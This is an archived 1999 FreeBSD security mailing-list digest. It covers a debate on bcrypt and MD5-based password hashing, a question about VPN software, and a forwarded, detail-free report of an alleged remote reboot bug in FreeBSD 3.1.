"$1$" clearly is important, because evan variable-cost hashes could potentially fail. We mention this briefly in our implementation section. I now regret that we did not credit FreeBSD for this more explicitly. We weren't really trying to claim this as a contribution; we just wanted to make the point that it's easy to have multiple hash functions in one password file. > That is not to say that the stuff they've come up with isn't better > than what we have, it certainly look a lot more robust. It lacks > the stamp of approval for export from the US which MD5 has, but > that could probably be arranged too. You could easily create an implementation of bcrypt that could not be used as a block cipher. What exactly is magically blessed about MD5? MD5's compression function (or MD5 itself) functions perfectly well as a block cipher in OFB or CFB modes. Is there some directive from the US government allowing the export of MD5 in source form? Bcrypt could easily be manipulated to achieve the same status as, say, arc4random--based on ARC4, but the implementation is hard to use for encryption. > In difference from virtually all other cryptographic uses, we don't > care much about our data (plaintext passwords), we can replace them > cheaply and easily, we just don't want anybody (ourselves included) > to be able to read them. Of course you can do that. You are effectively using the shared library version number on libc or libcrypt to determine the cost of hashing passwords. It's a lot nicer to have the two decoupled. If you are uncomfortable incorporating bcrypt for export-control reasons, I would still encourage you to allow variable cost in whatever you design next to replace MD5crypt (i.e. $3$). I think at this point peole can probably tolerate an algorithm about 10 times slower than MD5crypt. It should probably require between 1/10th of a second and one second to check a password, depending on the speed of the hardware. David To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 9: 9:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from mordor.xti.org (mordor.xti.org [193.212.232.254]) by hub.freebsd.org (Postfix) with SMTP id 1E76C15242 for ; Mon, 3 May 1999 09:09:40 -0700 (PDT) (envelope-from delta@xti.org) Received: (qmail 3781 invoked from network); 3 May 1999 11:44:01 -0000 Received: from mordor.xti.org (193.212.232.254) by login.xti.org with SMTP; 3 May 1999 11:44:01 -0000 Date: Mon, 3 May 1999 13:44:01 +0200 (CEST) From: Terje Elde To: freebsd-security@freebsd.org Subject: VPN, what to use? Message-ID: KEY-ID: 0x5B439BB3 Stuff: Why are you reading all the headers?? Do you think I hide lots of stuff up here?? Question: Do you know where *your* towel is? MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi all, I've been (for a LONG time) looking for some kind of compatible VPN package. It seems that cipe is linux-only, skip is for freebsd, sun and widows, IPSec is for everything but you can't both use kame and track a -stable thread as kame is distributed as patches against -RELEASE. What I really want is to have a small VPN, with only FreeBSD and linux boxes, but it seems you can't really do that. Then I noticed the manual keying thing of KAME. It looks a lot like IPSec, so what I'm starting to wonder is, can I use KAME with manual keying against a linux box running IPSec? Or am I totally lost now? Friendly greetings, Terje Elde "One world, one web, one program" - Microsoft Promo ad. "Ein Volk, Ein Reich, Ein Fuhrer" - Adolf Hitler To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 9:20: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id E42CC15043 for ; Mon, 3 May 1999 09:20:00 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id SAA00180; Mon, 3 May 1999 18:18:05 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id SAA08576; Mon, 3 May 1999 18:18:01 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: David Mazieres Cc: peter.jeremy@auss2.alcatel.com.au, adam@homeport.org, freebsd-security@FreeBSD.ORG, provos@openbsd.org Subject: Re: Blowfish/Twofish In-reply-to: Your message of "Mon, 03 May 1999 11:54:48 EDT." <199905031554.LAA09846@reeducation-labor.lcs.mit.edu> Date: Mon, 03 May 1999 18:18:01 +0200 Message-ID: <8574.925748281@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199905031554.LAA09846@reeducation-labor.lcs.mit.edu>, David Mazieres writes: >Well, I missed the beginning of the thread, but just got CCed on this, >so I will respond. > >First of all, the "$1$" clearly is important, because evan >variable-cost hashes could potentially fail. We mention this briefly >in our implementation section. I now regret that we did not credit >FreeBSD for this more explicitly. We weren't really trying to claim >this as a contribution; we just wanted to make the point that it's >easy to have multiple hash functions in one password file. Ahh, don't worry about that, we have the stuff in the CVS trees if we ever get to disagree about where it came from :-) >> That is not to say that the stuff they've come up with isn't better >> than what we have, it certainly look a lot more robust. It lacks >> the stamp of approval for export from the US which MD5 has, but >> that could probably be arranged too. > >You could easily create an implementation of bcrypt that could not be >used as a block cipher. What exactly is magically blessed about MD5? It's been blessed for export by the US gov in any form. >> In difference from virtually all other cryptographic uses, we don't >> care much about our data (plaintext passwords), we can replace them >> cheaply and easily, we just don't want anybody (ourselves included) >> to be able to read them. > >Of course you can do that. You are effectively using the shared >library version number on libc or libcrypt to determine the cost of >hashing passwords. It's a lot nicer to have the two decoupled. You lost me there... All I meant was that passwords should be changed every so often anyway, so changing algorithm doesn't have the tremendous scope it would have if you had a 5 year archive of correspondence encrypted (retrieve, decrypt, encrypt, store, delete+whipe old versions from media/destroy old media). >If you are uncomfortable incorporating bcrypt for export-control >reasons, I would still encourage you to allow variable cost in >whatever you design next to replace MD5crypt (i.e. $3$). I think at >this point peole can probably tolerate an algorithm about 10 times >slower than MD5crypt. It should probably require between 1/10th of a >second and one second to check a password, depending on the speed of >the hardware. I have no plans on creating a $3$ in the forseeable future, if at all: We'll probably just adopt something from OpenBSD :-) Until we have some kind of assurance that $2a$ can be exported we will have to go through all the mess with the .za repository and all that to use it. Poul-Henning -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 11:38:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from easeway.com (ns1.easeway.com [209.69.39.1]) by hub.freebsd.org (Postfix) with ESMTP id 6E29E14D71 for ; Mon, 3 May 1999 11:38:54 -0700 (PDT) (envelope-from mwlucas@easeway.com) Received: (from mwlucas@localhost) by easeway.com (8.8.8/8.8.5) id OAA13711; Mon, 3 May 1999 14:28:03 -0400 (EDT) Message-Id: <199905031828.OAA13711@easeway.com> Subject: Re: VPN, what to use? In-Reply-To: from Terje Elde at "May 3, 99 01:44:01 pm" To: delta@xti.org (Terje Elde) Date: Mon, 3 May 1999 14:28:03 -0400 (EDT) Cc: freebsd-security@FreeBSD.ORG From: mwlucas@exceptionet.com X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, Many people have addressed this problem by tunneling PPP over SSH. If you do a couple web searches on this, I'm sure you'll find some good pointers. As far as your particular solution: sorry, can't help you. :/ ==ml > > Hi all, > > I've been (for a LONG time) looking for some kind of compatible VPN > package. It seems that cipe is linux-only, skip is for freebsd, sun and > widows, IPSec is for everything but you can't both use kame and track a > -stable thread as kame is distributed as patches against -RELEASE. > > What I really want is to have a small VPN, with only FreeBSD and linux > boxes, but it seems you can't really do that. > > Then I noticed the manual keying thing of KAME. It looks a lot like IPSec, > so what I'm starting to wonder is, can I use KAME with manual keying > against a linux box running IPSec? > > Or am I totally lost now? > > Friendly greetings, > Terje Elde > > "One world, one web, one program" - Microsoft Promo ad. > "Ein Volk, Ein Reich, Ein Fuhrer" - Adolf Hitler > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Michael Lucas | Exceptionet, Inc. | www.exceptionet.com "Exceptional Networking" | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 12:22:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from brooklyn.slack.net (brooklyn.slack.net [206.41.21.102]) by hub.freebsd.org (Postfix) with ESMTP id 02BD7153CB for ; Mon, 3 May 1999 12:22:33 -0700 (PDT) (envelope-from andrewr@brooklyn.slack.net) Received: from localhost (andrewr@localhost) by brooklyn.slack.net (8.8.7/8.8.7) with SMTP id PAA13122; Mon, 3 May 1999 15:25:00 -0400 (EDT) Date: Mon, 3 May 1999 15:25:00 -0400 (EDT) From: andrewr To: David Mazieres Cc: phk@critter.freebsd.dk, peter.jeremy@auss2.alcatel.com.au, adam@homeport.org, freebsd-security@FreeBSD.ORG, provos@openbsd.org Subject: Re: Blowfish/Twofish In-Reply-To: <199905031554.LAA09846@reeducation-labor.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > You could easily create an implementation of bcrypt that could not be > used as a block cipher. What exactly is magically blessed about MD5? > MD5's compression function (or MD5 itself) functions perfectly well as > a block cipher in OFB or CFB modes. Is there some directive from the > US government allowing the export of MD5 in source form? Are you suggesting the use of MD5? Im assuming it would be bad to use MD5 because it is much quicker for one to possibly crack users passwords.. -Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 12:39: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (weathership.homeport.org [207.31.235.99]) by hub.freebsd.org (Postfix) with ESMTP id A110615362 for ; Mon, 3 May 1999 12:38:56 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id PAA28496; Mon, 3 May 1999 15:52:05 -0400 (EDT) Date: Mon, 3 May 1999 15:52:05 -0400 From: Adam Shostack To: andrewr Cc: David Mazieres , phk@critter.freebsd.dk, peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG, provos@openbsd.org Subject: Re: Blowfish/Twofish Message-ID: <19990503155204.A28374@weathership.homeport.org> References: <199905031554.LAA09846@reeducation-labor.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: ; from andrewr on Mon, May 03, 1999 at 03:25:00PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 03, 1999 at 03:25:00PM -0400, andrewr wrote: | > You could easily create an implementation of bcrypt that could not be | > used as a block cipher. What exactly is magically blessed about MD5? | > MD5's compression function (or MD5 itself) functions perfectly well as | > a block cipher in OFB or CFB modes. Is there some directive from the | > US government allowing the export of MD5 in source form? | | Are you suggesting the use of MD5? Im assuming it would be bad to use MD5 | because it is much quicker for one to possibly crack users passwords.. I'm suggesting that a design that uses a cipher to do a hash function's job is sub-optimal, except in cases where such adaption can be shown to have advantages. Such advantages can include tweaking the noses of the export control authorities, taking advantage of fast or secure hardware, taking better advantage of few gates in hardware, or extensive analysis of the underlying algorithm. In the case of DES, it can be argued that the heavy analysis that crypt() has undergone can be seen as an advantage, but that advantage doesn't carry to *fish. If you want to use any other construction, you'll need to analyze time issues, including brute force timing. It seems likely that using md5 would require a bunch of iterations. You could probably use fewer iterations of SHA-1, and yet fewer with RIPEMD-160 to absorb the same amount of attacker CPU time. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 13:17:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from brooklyn.slack.net (brooklyn.slack.net [206.41.21.102]) by hub.freebsd.org (Postfix) with ESMTP id CB20614EA2 for ; Mon, 3 May 1999 13:16:07 -0700 (PDT) (envelope-from andrewr@brooklyn.slack.net) Received: from localhost (andrewr@localhost) by brooklyn.slack.net (8.8.7/8.8.7) with SMTP id QAA29202; Mon, 3 May 1999 16:18:29 -0400 (EDT) Date: Mon, 3 May 1999 16:18:29 -0400 (EDT) From: andrewr To: Adam Shostack Cc: David Mazieres , phk@critter.freebsd.dk, peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG, provos@openbsd.org Subject: Re: Blowfish/Twofish In-Reply-To: <19990503155204.A28374@weathership.homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 3 May 1999, Adam Shostack wrote: > > If you want to use any other construction, you'll need to > analyze time issues, including brute force timing. It seems likely > that using md5 would require a bunch of iterations. You could > probably use fewer iterations of SHA-1, and yet fewer with RIPEMD-160 > to absorb the same amount of attacker CPU time. The multiple iterations is something that is *very* necesary and I agree with you on.. Take ssh, from what Ive seen, in my VERY LITTLE code browsing of it, it does not seem to do many iterations at all (when dealing with ssh key), therefore not making it too great.. (if that makes any sense ;). However, bruteforce timing is something that *should* be analyzed, so I agree with you a 100%. Andrew > > Adam > > > -- > "It is seldom that liberty of any kind is lost all at once." > -Hume > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 15:31:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from reeducation-labor.lcs.mit.edu (reeducation-labor.lcs.mit.edu [18.26.4.10]) by hub.freebsd.org (Postfix) with ESMTP id 894D014F86 for ; Mon, 3 May 1999 15:31:10 -0700 (PDT) (envelope-from dm@reeducation-labor.lcs.mit.edu) Received: (from dm@localhost) by reeducation-labor.lcs.mit.edu (8.9.3/8.8.7) id SAA12518; Mon, 3 May 1999 18:24:40 -0400 (EDT) Date: Mon, 3 May 1999 18:24:40 -0400 (EDT) Message-Id: <199905032224.SAA12518@reeducation-labor.lcs.mit.edu> From: David Mazieres To: adam@homeport.org Cc: andrewr@slack.net, phk@critter.freebsd.dk, peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG, provos@openbsd.org In-reply-to: <19990503155204.A28374@weathership.homeport.org> (message from Adam Shostack on Mon, 3 May 1999 15:52:05 -0400) Subject: Re: Blowfish/Twofish References: <199905031554.LAA09846@reeducation-labor.lcs.mit.edu> <19990503155204.A28374@weathership.homeport.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well, I've browsed the freebsd website mailing list archives a little bit, and would like to respond to several points that have come up in discussion. If you read our paper (ftp://cag.lcs.mit.edu/pub/dm/papers/provos:bcrypt.ps.gz), keep in mind that we are making two points: First, we suggest a specific set of criteria that any password function should aspire to. Second, we suggest a particular algorithm, namely bcrypt, that we conjecture satisfies these properties. I like bcrypt because it seems to achieve all the important properties of a password function while being very conservatively based on a well-analyzed block cipher. Of course, I'm sure other people can design equally good hashing functions. While I would like to see more operating systems adopt bcrypt, I'm not going to defend bcrypt against largely non-technical objections. To the extent that people are missing some of the important motivating factors behind bcrypt's design, however, I will respond to certain objections in the hopes of helping people contemplating designing yet another password system (whether based on twofish or SRP). Points people have made: * Bcrypt is export restricted I can't offer legal advice on this point. However, since FreeBSD already distributes arc4random, it should be easy to create an implementation of bcrypt that can no more easily be used for encryption. Such an implementation would presumably be exportable. * People shouldn't use block ciphers as hash functions * The security of a password hash based on a a block cipher is suboptimal. * The performance of a password hash based on a a block cipher is suboptimal. One of the most basic requirements of any block cipher is that it resist known plaintext attacks. In other words, if an attacker knows a message M and an ecryption E_k(M), he should have no way of recovering the encryption key k (other than by brute force guessing). In practice, block ciphers must resist more powerful attacks--for instance, a "chosen plaintext/ciphertext" attack in which the bad guy gets to evaluate the encryption/decryption function on arbitrary values in his effort to recover k. In the case of bcrypt, we are only relying on Blowfish's resistance to known plaintext attacks. Thus, bcrypt has a cryptographically sound design based on the very reasonable assumption that Blowfish resists known plaintext attacks. There are several other reasons one might not want to use a block cipher as a hash function, but none of them apply to bcrypt. One reason is that the domain of a hash function might be larger than the key space (e.g. MD5 has an input size of up to 2^64 bits, while bcrypt only allows 448 bits). This is irrelevant for password hashing, since above a certain length of password you only care about 2nd preimage resistance. Bcrypt has better 2nd preimage resistance than MD5 and SHA-1 because of its larger output size. Another reason to use hash functions is efficiency. Certainly bcrypt is too slow to be used as a general-purpose hash function. However, we specifically designed it to be slow. Given bcrypt's application, the real performance issue is making sure that the algorithm runs as efficiently as possible during legitimate. That way users can crank the cost and make off-line guessing attacks more expensive. Bcrypt achieves this because it only uses operations that are fast in software One of the reasons I chose to use blowfish is that it consumes a fair amount of space (4KB). This makes it harder to create a pipelined hardware implementation of bcrypt. None of the popular hash functions (e.g. MD5, SHA-1, tiger) have this property, because they are all designed to run fast in different settings. Since, absolute speed was not a goal of bcrypt, blowfish seemed like an attractive algorithm to use as a base. * Don't use the number pi to encrypt I'm not sure I entirely understand this objection. In order to frustrate hardware implementations of a hashing function based on a block cipher, it seems very desirable to choose a cipher with "secret" S-boxes--that is S-boxes that depend on the encryption key. It's even better if you can repeatedly run the key schedule to keep modifying the S-boxes based on their previous state. That way, you end up with a large amount of memory that must constantly be accessed and modified during the key schedule (which is the expensive part of bcrypt), and with an algorithm that exhibits little parallelism. The point of initially filling the S-boxes with the digits of pi is that Bruce Shneier did not invent the digits of pi. Thus, one can reasonably believe that he did not maliciously construct the initial S-boxes to weaken the cipher in some secret way. Better yet, because the digits of pi are essentially unrelated to the rest of the block cipher, we can make a reasonable argument that spinning the key schedule multiple times does not weaken the encryption algorithm. If, for instance, blowfish's initial S-boxes were specifically designed to resist linear cryptanalysis [I'm not sure why you would do this, since the initial S-boxes aren't the eventual ones], then spinning the key schedule a second time might actually weken security. Here, however, we can claim that the "generalized blowfish problem" in which the initial S-boxes are random is probably as hard as breaking regular blowfish, and the multiple key schedule blowfish problem is probably as hard as the generalized one. * Who cares? We should all be running SRP anyway. SRP is a nice protocol, but its use is somewhat orthogonal to bcrypt. The point of bcrypt is to avoid password guessing when the SRP server is compromised. In a research project I am currently working on, we use SRP in conjunction with eksblowfish (the algorithm bcrypt is based on). We use eksblowfish to hash together the salt, password, SRP modulus, and hostname of the server, and use the result as the user's secret exponent (i.e. the discrete log of the verifier stored by the server). This makes an off-line guessing attack against a compromised SRP database very expensive. An alternative approach would be to use a fast hash function but choose a much larger prime as the SRP modulus. This would increase the cost of exponentiation when comparing hashes of password guesses to a user's verifier. However, it would also unnecessarily cost the server CPU time during execution of the algorithm and increase the size of messages across the wire. Since there are also good optimizations one can perform to speed up multiple exponentiations of the same base, an attacker may still be to achieve a reasonable speedup compared to a legitimate execution of the protocol (depending on the implementation). A better approach is just to have the client perform a more expensive hash of the password. So even if you use SRP, you should still use a variable-cost hash function on passwords before feeding them into the SRP algorithm. David To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 16:11:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id DA988154AC for ; Mon, 3 May 1999 16:11:21 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id RAA05715 for ; Mon, 3 May 1999 17:11:17 -0600 (MDT) Message-Id: <4.2.0.37.19990503171021.04dd6630@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Mon, 03 May 1999 17:11:14 -0600 To: security@freebsd.org From: Brett Glass Subject: Claimed remote reboot exploit: Real or bogus? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Can anyone confirm or deny the existence of this exploit? >Return-Path: >Received: from brimstone.netspace.org (brimstone.netspace.org >[128.148.157.143]) > by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id QAA05374 > for ; Mon, 3 May 1999 16:34:55 -0600 (MDT) >Received: from netspace.org ([128.148.157.6]:25967 "EHLO netspace.org" >ident: "TIMEDOUT2") by brimstone.netspace.org with ESMTP id <44338-4047>; >Mon, 3 May 1999 18:31:54 -0400 >Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8d) with > spool id 452434 for BUGTRAQ@NETSPACE.ORG; Mon, 3 May 1999 22:31:01 > +0000 >Approved-By: aleph1@UNDERGROUND.ORG >Received: from dilbert.exodus.net (dilbert.exodus.net [216.33.66.132]) by > netspace.org (8.8.7/8.8.7) with ESMTP id EAA31442 for > ; Sat, 1 May 1999 04:17:47 -0400 >Received: (from jamie@localhost) by dilbert.exodus.net (8.9.1/8.9.1) id > DAA24310 for bugtraq@netspace.org; Sat, 1 May 1999 03:18:40 -0500 > (CDT) >Mime-Version: 1.0 >Content-Type: text/plain; charset=us-ascii >X-Mailer: Mutt 0.95.1i >RFC_Violation: You saw it here first! >X-PGP-Fingerprint: <921C135D> C4 48 1B 26 18 7B 1F D9 BA C4 9C 7A B1 07 07 E8 >X-No-Archive: Yes >X-Contact-Analog: ph:312.425.7140 fx:312.425.7240 >X-Contact-Page: 888.740.9533 || 7409533@skytel.com >Message-ID: <19990501031840.A24252@dilbert.exodus.net> >Date: Sat, 1 May 1999 03:18:40 -0500 >Reply-To: jamie@exodus.net >Sender: Bugtraq List >From: Jamie Rishaw >Subject: FreeBSD 3.1 remote reboot exploit >To: BUGTRAQ@netspace.org >X-UIDL: bb7cd1086853f3805dc34b1136a06c40 > >Hi, > > Sorry to be so vague, but I wanted to let everyone know, > > It's been demonstrated to me by two people who will not reveal "how" >that there is a remote bug exploit, almost certainly over IP, that will >cause FreeBSD-3.1 systems to reboot with no warnings. > > The second box this was demonstrated on today had no open services >besides ircd, and was remote rebooted. (The first box had open services >such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd >as the culprit). > > If anyone can shed some light on this (really bad) issue, it'd be >greatly appreciated, especially since I am(was) in the process of >upgrading all of my boxes to 3.1. (3.1-REL). > > Regards, > >-jamie >-- >jamie rishaw (efnet:gavroche) -- Exodus Communications, Inc. >>Sr. Network Engr, Chicago, SoCal Data Centers > In an interesting move Exodus Communications annouced today that > they have replaced all of their backbone engineers with furby's To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 16:14:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id 8BADF154AC for ; Mon, 3 May 1999 16:14:27 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: from torrey.cs.utah.edu (torrey.cs.utah.edu [155.99.212.91]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id RAA28602; Mon, 3 May 1999 17:14:26 -0600 (MDT) Received: (from danderse@localhost) by torrey.cs.utah.edu (8.9.1/8.9.1) id RAA20781; Mon, 3 May 1999 17:14:26 -0600 (MDT) (envelope-from danderse@cs.utah.edu) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Mon, 3 May 1999 17:14:26 -0600 (MDT) From: "David G. Andersen" To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Claimed remote reboot exploit: Real or bogus? In-Reply-To: Brett Glass's message of Mon, May 3 1999 <4.2.0.37.19990503171021.04dd6630@localhost> References: <4.2.0.37.19990503171021.04dd6630@localhost> X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid Message-ID: <14126.11662.104650.743414@torrey.cs.utah.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've asked for a bit more information from Jamie, but that was about 3 minutes ago, so I don't expect to hear back quite so soon. If his boxes are being rebooted, it's probably legitimate. Jamie's trustworthy, and competent. -Dave Lo and Behold, Brett Glass said: > Can anyone confirm or deny the existence of this exploit? > >Reply-To: jamie@exodus.net > >Sender: Bugtraq List > >From: Jamie Rishaw > >Subject: FreeBSD 3.1 remote reboot exploit > >To: BUGTRAQ@netspace.org > >X-UIDL: bb7cd1086853f3805dc34b1136a06c40 > > > >Hi, > > > > Sorry to be so vague, but I wanted to let everyone know, > > > > It's been demonstrated to me by two people who will not reveal "how" > >that there is a remote bug exploit, almost certainly over IP, that will > >cause FreeBSD-3.1 systems to reboot with no warnings. > > > > The second box this was demonstrated on today had no open services > >besides ircd, and was remote rebooted. (The first box had open services > >such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd > >as the culprit). > > > > If anyone can shed some light on this (really bad) issue, it'd be > >greatly appreciated, especially since I am(was) in the process of > >upgrading all of my boxes to 3.1. (3.1-REL). -- work: danderse@cs.utah.edu me: angio@pobox.com University of Utah http://www.angio.net/ Computer Science - Flux Research Group "What's footnote FIVE?" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 16:29:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 7727E14BC9 for ; Mon, 3 May 1999 16:29:31 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id RAA05962; Mon, 3 May 1999 17:29:24 -0600 (MDT) Message-Id: <4.2.0.37.19990503172000.04f63ee0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Mon, 03 May 1999 17:29:20 -0600 To: "David G. Andersen" From: Brett Glass Subject: Re: Claimed remote reboot exploit: Real or bogus? Cc: security@FreeBSD.ORG In-Reply-To: <14126.11662.104650.743414@torrey.cs.utah.edu> References: <4.2.0.37.19990503171021.04dd6630@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If I were Jamie, I would have had a network analyzer on the line during the "demonstration." We've held off on installing 3.1-R on our servers because we always wait for the second "production" point release of any major version before upgrading. (This policy has kept us at 2.2.8 -- plus patches -- for the time being.) We have come under fire on a few mailing lists for this, but if the exploit is for real it will vindicate our conservative practices yet again. Still, the release of 3.2-R is nigh, and we DO want to install that one. So, we'd like to see the exploit identified and squashed before 3.2-R goes out the door. --Brett At 05:14 PM 5/3/99 -0600, David G. Andersen wrote: >I've asked for a bit more information from Jamie, but that was about 3 >minutes ago, so I don't expect to hear back quite so soon. > >If his boxes are being rebooted, it's probably legitimate. Jamie's >trustworthy, and competent. > > -Dave To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 16:32:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from fed-ef1.frb.gov (fed.frb.gov [132.200.32.32]) by hub.freebsd.org (Postfix) with ESMTP id 5C81B14BC9; Mon, 3 May 1999 16:32:18 -0700 (PDT) (envelope-from seth@freebie.dp.ny.frb.org) Received: by fed-ef1.frb.gov; id TAA18455; Mon, 3 May 1999 19:32:18 -0400 (EDT) Received: from m1pmdf.frb.gov(192.168.3.38) by fed.frb.gov via smap (V4.2) id xma018420; Mon, 3 May 99 19:32:15 -0400 Date: Mon, 03 May 1999 19:32:11 -0400 (EDT) From: Seth Subject: FreeBSD 3.1 remote reboot exploit (fwd) To: freebsd-stable@freebsd.org, security@freebsd.org Message-id: MIME-version: 1.0 Content-type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just hit bugtraq, figured people might want to get in touch or start digging. SB ---------- Forwarded message ---------- Date: Sat, 01 May 1999 03:18:40 -0500 From: Jamie Rishaw To: BUGTRAQ@netspace.org Subject: FreeBSD 3.1 remote reboot exploit Hi, Sorry to be so vague, but I wanted to let everyone know, It's been demonstrated to me by two people who will not reveal "how" that there is a remote bug exploit, almost certainly over IP, that will cause FreeBSD-3.1 systems to reboot with no warnings. The second box this was demonstrated on today had no open services besides ircd, and was remote rebooted. (The first box had open services such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd as the culprit). If anyone can shed some light on this (really bad) issue, it'd be greatly appreciated, especially since I am(was) in the process of upgrading all of my boxes to 3.1. (3.1-REL). Regards, -jamie -- jamie rishaw (efnet:gavroche) -- Exodus Communications, Inc. >Sr. Network Engr, Chicago, SoCal Data Centers In an interesting move Exodus Communications annouced today that they have replaced all of their backbone engineers with furby's To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 16:40:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from paprika.michvhf.com (paprika.michvhf.com [209.57.60.12]) by hub.freebsd.org (Postfix) with SMTP id 26A1314EC4 for ; Mon, 3 May 1999 16:40:55 -0700 (PDT) (envelope-from vev@michvhf.com) Received: (qmail 11372 invoked by uid 1001); 3 May 1999 23:40:59 -0000 Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Mon, 03 May 